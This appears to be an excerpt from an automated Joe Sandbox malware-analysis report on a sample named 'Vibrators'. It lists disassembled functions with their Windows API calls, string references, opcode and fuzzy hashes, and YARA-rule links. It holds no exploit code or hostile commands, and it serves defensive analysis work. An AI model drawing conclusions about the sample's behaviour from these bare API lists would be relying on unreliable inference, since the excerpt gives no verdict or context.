Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ba4f92180c8d82b19532aba3ed69aefa191e14be48c748c76f0db8c498b68e70
Instruction ID: 47d12150e0f98d4ed4a251b7bb6f41b7a969664184754775770d38ce94516dc0
Opcode Fuzzy Hash: ba4f92180c8d82b19532aba3ed69aefa191e14be48c748c76f0db8c498b68e70
Instruction Fuzzy Hash: D41140B9D0020DAFDB41DFA8C884AEEBBB5FB08310F508166E915E2250E735AA55CF50

Function 00A536F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A53712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53723
GetCurrentThreadId.KERNEL32 ref: 00A5372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A53731

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: faf0ec6273bedf7a0ec3a5205f2591384a3419c5b257705e11e09a1882a653f9
Instruction ID: 3a509055ef2d4da4c49427c2c02c50d2cd8dde7d2f3f60fd657d914a0b2f94ed
Opcode Fuzzy Hash: faf0ec6273bedf7a0ec3a5205f2591384a3419c5b257705e11e09a1882a653f9
Instruction Fuzzy Hash: 38E06DB25012287ADA2097A2AC4DEEB7F6CEF86BE2F000015F505E20C0EAA08945C2B0

Function 00A892BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 009F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009F1F87
Part of subcall function 009F1F2D: SelectObject.GDI32(?,00000000), ref: 009F1F96
Part of subcall function 009F1F2D: BeginPath.GDI32(?), ref: 009F1FAD
Part of subcall function 009F1F2D: SelectObject.GDI32(?,00000000), ref: 009F1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A892E3
LineTo.GDI32(?,?,?), ref: 00A892F0
EndPath.GDI32(?), ref: 00A89300
StrokePath.GDI32(?), ref: 00A8930E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 5d56b78f4f07872a7ca9d6babdc6cdd98ed14f497ccbe7df35069470b7e233ee
Instruction ID: 2b91a7e1e7809f5d1d334d9224d730915cb7981f04b265e9ccda277fa5a5ae5e
Opcode Fuzzy Hash: 5d56b78f4f07872a7ca9d6babdc6cdd98ed14f497ccbe7df35069470b7e233ee
Instruction Fuzzy Hash: 10F0FE31045259BBDB12BF94AC0EFDE3F6AAF0A320F048104FA16650E1C77555629BE5

Function 009F21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009F21BC
SetTextColor.GDI32(?,?), ref: 009F21C6
SetBkMode.GDI32(?,00000001), ref: 009F21D9
GetStockObject.GDI32(00000005), ref: 009F21E1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 74ac455053edb25273923df2b4ee754edbe590c60f1046bd76e594aec3eacaf2
Instruction ID: aad2d0bc0012ccbb0a14c1b3e5d1f2fbff3054c2fa2006242491ae4b866cb5a1
Opcode Fuzzy Hash: 74ac455053edb25273923df2b4ee754edbe590c60f1046bd76e594aec3eacaf2
Instruction Fuzzy Hash: 90E01B32244644AEDF219FB4BC0DBE97B51AF15735F148319F7F6580E0C77146459B11

Function 00A4EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A4EC36
GetDC.USER32(00000000), ref: 00A4EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4EC60
ReleaseDC.USER32(?), ref: 00A4EC81

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f641171417b60a2c9f362c2953f0316b2bc4b47477e1e092c7c6abdf5cae659c
Instruction ID: 34a43f6977460b2b8e1c591d6e05d89118bb8e6d7140bc87adbcfb9e80dcadaa
Opcode Fuzzy Hash: f641171417b60a2c9f362c2953f0316b2bc4b47477e1e092c7c6abdf5cae659c
Instruction Fuzzy Hash: A5E09A75810209DFCB41DFA0D948A6DBFB5FF58311F108459E94AE3290D7795942AF50

Function 00A4EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A4EC4A
GetDC.USER32(00000000), ref: 00A4EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4EC60
ReleaseDC.USER32(?), ref: 00A4EC81

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 984df1b9f636bfffaa193f418e65f051fb7804b85ebce21094e09dfebffa3173
Instruction ID: 8618439bbfc275e219d93e4164ad10d08470d5c5396757f00b1ee95e3c1fe2c9
Opcode Fuzzy Hash: 984df1b9f636bfffaa193f418e65f051fb7804b85ebce21094e09dfebffa3173
Instruction Fuzzy Hash: C8E09A75C10209DFCB51DFA0D948A5DBBB5BF58311B108459E94AE3290D7795902AF10

Function 00A657CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 009F41EA: _wcslen.LIBCMT ref: 009F41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A65919

Strings

LPT, xrefs: 00A65840
*, xrefs: 00A65855

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: aebd30bd3c5ffe235f366c08a127fd2dc8e6d329ec1a333fab931697db556f4c
Instruction ID: fd5980d41f83a003974aa36cb39cbf576904dc62f90a231152c3f60f7d25631e
Opcode Fuzzy Hash: aebd30bd3c5ffe235f366c08a127fd2dc8e6d329ec1a333fab931697db556f4c
Instruction Fuzzy Hash: 2C915E75E00604DFCB14DFA4C894EAABBF1AF55314F198099E8499F362C771EE85CB90

Function 00A1E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A1E67D

Strings

pow, xrefs: 00A1E655, 00A1E672

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: e2143c0c93d296daf77ada8fb895cfe957fa2672a2d9bdf131c8b0852e8fb5e6
Instruction ID: ca679bdf16308dc9b7b75d81aa612d5122eb8a4e063f540a43e916e7781e4a36
Opcode Fuzzy Hash: e2143c0c93d296daf77ada8fb895cfe957fa2672a2d9bdf131c8b0852e8fb5e6
Instruction Fuzzy Hash: A751AE71E0A10196DB15F71CEE413EA2BB0AB50740F744E79F8A1462E8DF3D8CE69B46

Function 00A0A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00A0A916

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a1a259af8ad3f6fbd28f15d47e13356d4aa015f7ef14edf3590c8f8b81945b82
Instruction ID: bfecd1f38a1b7694e0302c01d3fff999aec01b1e99cfd41896571b7c30c46882
Opcode Fuzzy Hash: a1a259af8ad3f6fbd28f15d47e13356d4aa015f7ef14edf3590c8f8b81945b82
Instruction Fuzzy Hash: D851323960434ADFCB25DF68E441ABE7BB0EFA5310F244055F9919B2D0DB389D82CB61

Function 00A0F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A0F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A0F6F4

Strings

@, xrefs: 00A0F6E8

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: dc216e3ca5eb6465528d1f5e6c17f1bf31817b35504763cd79ad7956a1215695
Instruction ID: 8e05d031088f0b7bd865706e0bdec3493ebbc5538619943fc8433bd737dd5fe6
Opcode Fuzzy Hash: dc216e3ca5eb6465528d1f5e6c17f1bf31817b35504763cd79ad7956a1215695
Instruction Fuzzy Hash: 4E5138B14087499BD360AF54DC86BBBBBE8FBC5314F81485DF2D9811A1DB308929CB66

Function 00A761A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00A7623D
_wcslen.LIBCMT ref: 00A76249

Strings

CALLARGARRAY, xrefs: 00A76243, 00A76248

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 577a8ecfb9666199eeb802ccafad7c8c07d443f54e2a66b670df4798842b8561
Instruction ID: 5ca1ce6fafefd80600aab6fdba44835da21ff319541917db7b82704c5f607e2d
Opcode Fuzzy Hash: 577a8ecfb9666199eeb802ccafad7c8c07d443f54e2a66b670df4798842b8561
Instruction Fuzzy Hash: 5941C271E006199FCB04DFA8CD85AFEBBB5FF58364F108169E509A7292E7709D81CB90

Function 00A6DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A6DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A6DB7F

Strings

|, xrefs: 00A6DB50

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 78c121271621cc7ff61eca56b23d3e68f819d60e6881a6d63e7f88a7fe406a04
Instruction ID: 3f19d605bfc231a373d958507050bbad163f741e10e743378cd835e0c87d6ff9
Opcode Fuzzy Hash: 78c121271621cc7ff61eca56b23d3e68f819d60e6881a6d63e7f88a7fe406a04
Instruction Fuzzy Hash: 7A315A71D0110DABCF45EFA4CD85AEEBFB9FF48344F100029F915A6266EB719A16CB60

Function 00A84008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A840BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A840F8

Strings

static, xrefs: 00A84058

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: cf1bcf576f1446ffb9aa10e16f6195400f47669225c12e1d1a3d51ed7a8a6f68
Instruction ID: 322ead4d9b10652bfd5dda32c457ca1bbfb30e1b2bd68806ad4edbc8c2966a1f
Opcode Fuzzy Hash: cf1bcf576f1446ffb9aa10e16f6195400f47669225c12e1d1a3d51ed7a8a6f68
Instruction Fuzzy Hash: D8319E71510605AADB24EF78CC80FFB77B9FF88764F008619FAA587190DA75AC81DB60

Function 00A84FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A850BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A850D2

Strings

', xrefs: 00A8502C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 47449d308e85e77141c241a1e5093b1ca789a82fc5cda81fef94e358a05e4458
Instruction ID: da6863aa6484a377c138c02b961863a670d46cb3abecfc685753a03ca96a2a51
Opcode Fuzzy Hash: 47449d308e85e77141c241a1e5093b1ca789a82fc5cda81fef94e358a05e4458
Instruction Fuzzy Hash: BE31F474E0160A9FDB14DFA9C980BEABBB5FF49304F20416AED04AB391D771A945CF90

Function 00A83C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A83D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A83D23

Strings

Combobox, xrefs: 00A83CE5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 973a56cd805b976a19bc9b7451776376b273e392caa245ced55e658aa9f67624
Instruction ID: 9af64a685b85eb82accc5d7222721d5b0d138d70df72dc6c5b68e5cebb0b9ea1
Opcode Fuzzy Hash: 973a56cd805b976a19bc9b7451776376b273e392caa245ced55e658aa9f67624
Instruction Fuzzy Hash: 2911B2B2700208BFEF11EF54CC80FBB3B6AEB847A4F104524F91597290D671DD5287A0

Function 00A841AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009F78B1
Part of subcall function 009F7873: GetStockObject.GDI32(00000011), ref: 009F78C5
Part of subcall function 009F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F78CF

GetWindowRect.USER32(00000000,?), ref: 00A84216
GetSysColor.USER32(00000012), ref: 00A84230

Strings

static, xrefs: 00A841F3

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 33e992cb6193d9a13bbe87dcb921b9aa30f0675887c7d44d0f03e81e2ea1aeaa
Instruction ID: 1f0913c2da640f062dfa76a75c6b3c4ea5c26b845ad8a8e9c039ecafe719c161
Opcode Fuzzy Hash: 33e992cb6193d9a13bbe87dcb921b9aa30f0675887c7d44d0f03e81e2ea1aeaa
Instruction Fuzzy Hash: A311F67261020AAFDB01EFA8CC45AFA7BB8FB08354F014929FD65E3250E675E8519B60

Function 00A6D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A6D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A6D7EB

Strings

<local>, xrefs: 00A6D7AB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f36e5dfba022646b8ac39548318faa81a57e57bbc0f85fbc566514d1d2afeda4
Instruction ID: 26dc4ef3f8e553b0d1c5251bab4881141653dfa3c9cce3459d4b89b4c6fe9b65
Opcode Fuzzy Hash: f36e5dfba022646b8ac39548318faa81a57e57bbc0f85fbc566514d1d2afeda4
Instruction Fuzzy Hash: F511E971B052327DD7344B668C85EF7BE7DEF127E4F104226F50993180D6649840D6F1

Function 00A575ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

CharUpperBuffW.USER32(?,?,?), ref: 00A5761D
_wcslen.LIBCMT ref: 00A57629

Strings

STOP, xrefs: 00A57623, 00A57628

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: ef5bac6ca49b60ab02e62e5b67ca31c1a5c761f313bd5009a8557b3707457a64
Instruction ID: 688c8e44c98fbad71f5f1d28662302a7e2b3ff325a7bbbfcd3bd21be21af737c
Opcode Fuzzy Hash: ef5bac6ca49b60ab02e62e5b67ca31c1a5c761f313bd5009a8557b3707457a64
Instruction Fuzzy Hash: A201C032A1492A8BCB20AFBDEC50DBF73B5BB607517500524E825A3691EB31D9188790

Function 00A5262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A52699

Strings

ComboBox, xrefs: 00A52638
ListBox, xrefs: 00A52663

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
